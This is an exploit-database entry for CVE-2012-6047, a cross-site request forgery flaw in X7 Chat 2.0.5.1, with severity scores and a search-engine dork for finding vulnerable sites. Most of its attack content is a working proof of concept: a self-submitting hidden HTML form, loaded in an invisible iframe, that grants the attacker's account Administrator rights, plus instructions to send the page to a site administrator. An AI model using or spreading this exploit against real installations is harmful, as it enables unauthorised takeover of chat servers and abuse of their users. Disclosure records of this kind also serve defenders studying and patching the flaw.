X7 Chat 2.0.5.1 Cross Site Request Forgery

2012-05-10 / 2012-11-28
Credit: DennSpec
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2012-6047
CWE: CWE-352
Dork: intitle:\"Chat Room\" \"Powered By X7 Chat 2.0.5\"


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit # Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" # Date: 09.05.2012 # Author: DennSpec # Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip # Version: <= 2.0.5.1 firstly, register and give a username. (frame.html in path of your main html page) <html> <body onload="document.xform.submit();"> <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post"> <input type="hidden" name="username" value="YOURUSERNAME" /> <input type="hidden" name="usergroup" value="Administrator" /> </form> </body> </html> Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME. add this code to inside body tag of main html page: <iframe style="display:none;" src="frame.html"></iframe> and... upload main page and frame.html . Send main page url to any administrator.

References:

http://x7chat.com/releases/v2/x7chat2_0_5_1.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top